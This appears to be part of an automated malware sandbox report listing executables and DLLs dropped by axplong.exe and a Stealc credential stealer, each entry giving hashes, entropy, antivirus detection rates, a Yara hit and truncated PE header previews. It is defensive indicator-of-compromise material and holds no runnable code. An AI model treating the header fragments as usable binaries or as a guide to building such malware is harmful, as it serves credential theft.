                                                                                                                                                                          SSDEEP:6144:+tWC7xvtddofKKrybbuMY88Jc/oZ3ipoOvYcOCL7E6tt7thlp4:+RZtddofKKrzHPJ3ii0bL7E6t7Z2
                                                                                                                                                                          MD5:FBA8F56206955304B2A6207D9F5E8032
                                                                                                                                                                          SHA1:F84CBCC3E34F4D2C8FEA97C2562F937E1E20FE28
                                                                                                                                                                          SHA-256:11227EAD147B4154C7BD21B75D7F130B498C9AD9B520CA1814C5D6A688C89B1B
                                                                                                                                                                          SHA-512:56E3A0823A7ABE08E1C9918D8FA32C574208B462B423AB6BDE03345C654B75785FDC3180580C0D55280644B3A9574983E925F2125C2D340CF5E96B98237E99FA
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g.................D........................@.......................................@.................................R....................................K...................................................................................text....B.......D.................. ..`.rdata..'%...`...&...H..............@..@.data............b...n..............@....reloc...K.......L..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):526848
                                                                                                                                                                          Entropy (8bit):7.806472978332927
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:NL07gVkGXreL4LV8wdljMagCkqZBtzPmmhwAoXC+YF:Nw7g6GXrnFkm1PmmBqC+YF
                                                                                                                                                                          MD5:26D8D52BAC8F4615861F39E118EFA28D
                                                                                                                                                                          SHA1:EFD5A7CCD128FFE280AF75EC8B3E465C989D9E35
                                                                                                                                                                          SHA-256:8521A1F4D523A2A9E7F8DDF01147E65E7F3FF54B268E9B40F91E07DC01FA148F
                                                                                                                                                                          SHA-512:1911A21D654E317FBA50308007BB9D56FBA2C19A545EF6DFAADE17821B0F8FC48AA041C8A4A0339BEE61CBD429852D561985E27C574ECED716B2E937AFA18733
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....E..........."...0.................. ... ....@.. .......................`............@.....................................O.... ..L....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...L.... ......................@..@.reloc.......@......................@..B........................H........(...............>..............................................6.(.....(....*z.,..{....,..{....o......(....*....0...........s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s ...}.....s!...}.....("....{.... .....Ws#...o$....{....r...po%....{.... ......s&...o'....{.....o(....{.... (... ....s#...o$....{....r...po%....{.... ......s&...o'....{..
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):314368
                                                                                                                                                                          Entropy (8bit):6.339215930674792
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6144:k0wBiMDYtUokCulxMfpbjnekAoQGZRFsnE7w+Uw3NKR9hU/W9:RwMtUoH35nLP7Fa4wx8KRF9
                                                                                                                                                                          MD5:68A99CF42959DC6406AF26E91D39F523
                                                                                                                                                                          SHA1:F11DB933A83400136DC992820F485E0B73F1B933
                                                                                                                                                                          SHA-256:C200DDB7B54F8FA4E3ACB6671F5FA0A13D54BD41B978D13E336F0497F46244F3
                                                                                                                                                                          SHA-512:7342073378D188912B3E7C6BE498055DDF48F04C8DEF8E87C630C69294BCFD0802280BABE8F86B88EAED40E983BCF054E527F457BB941C584B6EA54AD0F0AA75
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Yara Hits:
                                                                                                                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe, Author: Joe Security
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C..............X......m.......Y.......p.....y.........`...............\......n.....Rich............PE..L...K..g......................$......i............@...........................&...........@.................................@...<.............................%..$...................................................................................text............................... ....rdata..............................@..@.data.....#.........................@....reloc...E....%..F..................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):685392
                                                                                                                                                                          Entropy (8bit):6.872871740790978
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):608080
                                                                                                                                                                          Entropy (8bit):6.833616094889818
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):450024
                                                                                                                                                                          Entropy (8bit):6.673992339875127
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2046288
                                                                                                                                                                          Entropy (8bit):6.787733948558952
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):3024384
                                                                                                                                                                          Entropy (8bit):6.520311944109943
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:49152:7h+1X0gVt9n8RLfp9ePqvSKkFf7AILEL:9+1X08t9na2iZeLEL
                                                                                                                                                                          MD5:6250E716BE9BB3618C85DA75BB8A8351
                                                                                                                                                                          SHA1:60533E737BDDEF80D4E94C103109EE8677639196
                                                                                                                                                                          SHA-256:2E392125F3B243B95CBE940912E0483DB711C2820937FB684862F519FEF9FB69
                                                                                                                                                                          SHA-512:A13A28E597A460509F06A3EC1BD425BC277E9F8BDAAA009EEB063D2398CFCD9ECA1A2A3A7963B47F8BEB516460E40E4D0A5A41FE6BC6A278B145AE22BA97C408
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........01...........@..........................`1...........@.................................T...h................................................................................................................... . .........~..................@....rsrc ............................@....idata ............................@...wrsfsivy.p+......p+.................@...bfxftgti..... 1.....................@....taggant.0...01.."..................@...........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2137600
                                                                                                                                                                          Entropy (8bit):7.961389881797388
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:49152:uGVhpyQho3PpnAE1ktGuQXdOS98NNT/tspRkYlQ3Yr2We5Vz+:hHouyWGuQNOS98NLCMYcD+
                                                                                                                                                                          MD5:212E008D0B8A1D4874846987F37E34FA
                                                                                                                                                                          SHA1:0C125B1139DBBB0AA2FEDFB916D1365001CCE1E9
                                                                                                                                                                          SHA-256:D9D47FD94A18E02CB473EC8ED22D7D7F6CE79825F999D129D662F71409A48082
                                                                                                                                                                          SHA-512:F2D886EF7CEDC828234029B48BB146C449ECDF7D2D293C759AF6DC61F873FE873BE5CBEA21B9C07FD6ED868AA8B32CBA804B79BD788475F53490B54872E7D0D6
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g......................,.......r...........@...........................r......B!...@.................................P...d................................................................................................................... . .p.......v..................@....rsrc ............................@....idata ............................@... ..).........................@...cbbjugzk......X.....................@...lfmofsyx.....pr......x .............@....taggant.0....r.."...| .............@...........................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):257872
                                                                                                                                                                          Entropy (8bit):6.727482641240852
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1224767
                                                                                                                                                                          Entropy (8bit):7.973762647331916
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24576:G/e3qkBTWU2YmUQEg/IcuH+PtJ1NFDk6S2JPxeRcMZYj2I:wsgUzg/TuelJHDDTeVuJ
                                                                                                                                                                          MD5:5D97C2475C8A4D52E140EF4650D1028B
                                                                                                                                                                          SHA1:DA20D0A43D6F8DB44FF8212875A7E0F7BB223223
                                                                                                                                                                          SHA-256:F34DD7EC6030B1879D60FAA8705FA1668ADC210DDD52BCB2B0C2406606C5BCCF
                                                                                                                                                                          SHA-512:22C684B21D0A9EB2EAA47329832E8EE64B003CFB3A9A5D8B719445A8532B18AAD913F84025A27C95296EBEB34920FA62D64F28145CCFA3AA7D82BA95381924EE
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n...N...B...8............@..................................P....@.................................4........@.................h(......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc........@......................@..@.reloc..2............2..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):80880
                                                                                                                                                                          Entropy (8bit):6.920480786566406
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):7110656
                                                                                                                                                                          Entropy (8bit):6.076540689462371
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:49152:/zIEPn3XBZiN8H42XBegbR6wvWiIPm2WLrSrx2bagbq9e2hiPQuFKxb+0KKJXMNS:/zBBZir2RVbRePhyrycbRqY9K1
                                                                                                                                                                          MD5:87E4E869971CEC9573811040F6140157
                                                                                                                                                                          SHA1:6308D9E243317A829D602C6A2F667FFF6D05D148
                                                                                                                                                                          SHA-256:0AD7E833D526131900916008913DEC998360EE6D1A9AACF3997602E1CFC1C3E3
                                                                                                                                                                          SHA-512:71F1040D823DEB28361966E41F0CBA63D735425EDC83C9D790B1BFFC2ABE97EB5FE2642358B0AA3B9A505230D87049C0D36F84E58499575D2D5983926DF0E881
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...yZ"g...............(..F..|l..2............F...@...........................m.......m...@... ...............................i.P(............................i.p.............................i.......................i.p............................text...L.F.......F.................`..`.data... .....F.......F.............@....rdata...j....T..l....T.............@..@.eh_framP/... i..0....i.............@..@.bss....`1...Pi..........................idata..P(....i..*...6i.............@....CRT....0.....i......`i.............@....tls..........i......bi.............@....reloc..p.....i......di.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):665088
                                                                                                                                                                          Entropy (8bit):7.641303787368916
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:3KbQTjM37Fhgr4ZNkE1Er41iaNhqqitQ+jHKVkdvXPg9O/1ACWFtIK5NcDU:nTY37wr4ZyprDGqqitSkxPg41XgtF5Wo
                                                                                                                                                                          MD5:E3D038EE8743EEB4759105852F8C9973
                                                                                                                                                                          SHA1:C029F68A065ECBAF124F2D8569FC3D097CFF8DA9
                                                                                                                                                                          SHA-256:250784E06AC98AD9183950EF5EC3549C2A5E2FFB0306F167AE84C4CB55B12922
                                                                                                                                                                          SHA-512:F45BA1D08582AD5DAF8B09FAA52807169542B29054204DA2E346F9DBD84D93041452503EC87617979B326A3D9E00EFE18FE7CC6BAA377C6E99327161BB886445
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....n"g............................B.............@.......................................@.....................................(............................@..l ..........................`.......x...............\...L............................text............................... ..`.rdata..............................@..@.data....1..........................@....00cfg....... ......................@..@.tls.........0......................@....reloc..l ...@..."..................@..B.bss.........p..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):314368
                                                                                                                                                                          Entropy (8bit):6.339215930674792
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6144:k0wBiMDYtUokCulxMfpbjnekAoQGZRFsnE7w+Uw3NKR9hU/W9:RwMtUoH35nLP7Fa4wx8KRF9
                                                                                                                                                                          MD5:68A99CF42959DC6406AF26E91D39F523
                                                                                                                                                                          SHA1:F11DB933A83400136DC992820F485E0B73F1B933
                                                                                                                                                                          SHA-256:C200DDB7B54F8FA4E3ACB6671F5FA0A13D54BD41B978D13E336F0497F46244F3
                                                                                                                                                                          SHA-512:7342073378D188912B3E7C6BE498055DDF48F04C8DEF8E87C630C69294BCFD0802280BABE8F86B88EAED40E983BCF054E527F457BB941C584B6EA54AD0F0AA75
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Yara Hits:
                                                                                                                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C..............X......m.......Y.......p.....y.........`...............\......n.....Rich............PE..L...K..g......................$......i............@...........................&...........@.................................@...<.............................%..$...................................................................................text............................... ....rdata..............................@..@.data.....#.........................@....reloc...E....%..F..................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):7110656
                                                                                                                                                                          Entropy (8bit):6.076540689462371
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:49152:/zIEPn3XBZiN8H42XBegbR6wvWiIPm2WLrSrx2bagbq9e2hiPQuFKxb+0KKJXMNS:/zBBZir2RVbRePhyrycbRqY9K1
                                                                                                                                                                          MD5:87E4E869971CEC9573811040F6140157
                                                                                                                                                                          SHA1:6308D9E243317A829D602C6A2F667FFF6D05D148
                                                                                                                                                                          SHA-256:0AD7E833D526131900916008913DEC998360EE6D1A9AACF3997602E1CFC1C3E3
                                                                                                                                                                          SHA-512:71F1040D823DEB28361966E41F0CBA63D735425EDC83C9D790B1BFFC2ABE97EB5FE2642358B0AA3B9A505230D87049C0D36F84E58499575D2D5983926DF0E881
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...yZ"g...............(..F..|l..2............F...@...........................m.......m...@... ...............................i.P(............................i.p.............................i.......................i.p............................text...L.F.......F.................`..`.data... .....F.......F.............@....rdata...j....T..l....T.............@..@.eh_framP/... i..0....i.............@..@.bss....`1...Pi..........................idata..P(....i..*...6i.............@....CRT....0.....i......`i.............@....tls..........i......bi.............@....reloc..p.....i......di.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1224767
                                                                                                                                                                          Entropy (8bit):7.973762647331916
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24576:G/e3qkBTWU2YmUQEg/IcuH+PtJ1NFDk6S2JPxeRcMZYj2I:wsgUzg/TuelJHDDTeVuJ
                                                                                                                                                                          MD5:5D97C2475C8A4D52E140EF4650D1028B
                                                                                                                                                                          SHA1:DA20D0A43D6F8DB44FF8212875A7E0F7BB223223
                                                                                                                                                                          SHA-256:F34DD7EC6030B1879D60FAA8705FA1668ADC210DDD52BCB2B0C2406606C5BCCF
                                                                                                                                                                          SHA-512:22C684B21D0A9EB2EAA47329832E8EE64B003CFB3A9A5D8B719445A8532B18AAD913F84025A27C95296EBEB34920FA62D64F28145CCFA3AA7D82BA95381924EE
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n...N...B...8............@..................................P....@.................................4........@.................h(......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc........@......................@..@.reloc..2............2..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5952512
                                                                                                                                                                          Entropy (8bit):7.874022549731662
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:98304:S1DARPEaQuozISL3R0yFmGPwnvYw9iyiqWAWjuQCmtGlSliMhabgxEA:oFzuCII9CniytWjuQTtASl9hasb
                                                                                                                                                                          MD5:5009B1EF6619ECA039925510D4FD51A1
                                                                                                                                                                          SHA1:22626AA57E21291A995615F9F6BBA083D8706764
                                                                                                                                                                          SHA-256:FBC8C32BF799A005C57540A2E85DD3662ED5795A55F11495F0BA569BBB09DF59
                                                                                                                                                                          SHA-512:2B5BBD9449BE00588058966DB487C0ADFAC764827A6691F6A9FC6C3A770A93BDA11C732D2EB2A3C660697CBC69B1C71A2BF76D2957F65CD2599FB28098B24F14
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............K...........@..........................P........[...@...................................>......`.......................P..\.................................................... 0..............................text....I.......................... ..`.rdata..=%...`......................@..@.data...............................@....vmp.+..*......................... ..`.vmp.+d.... 0.....................@....vmp.+P.X..00...X................. ..`.reloc..\....P......."X.............@..@.rsrc........`.......*X.............@..@........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):526848
                                                                                                                                                                          Entropy (8bit):7.806472978332927
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:NL07gVkGXreL4LV8wdljMagCkqZBtzPmmhwAoXC+YF:Nw7g6GXrnFkm1PmmBqC+YF
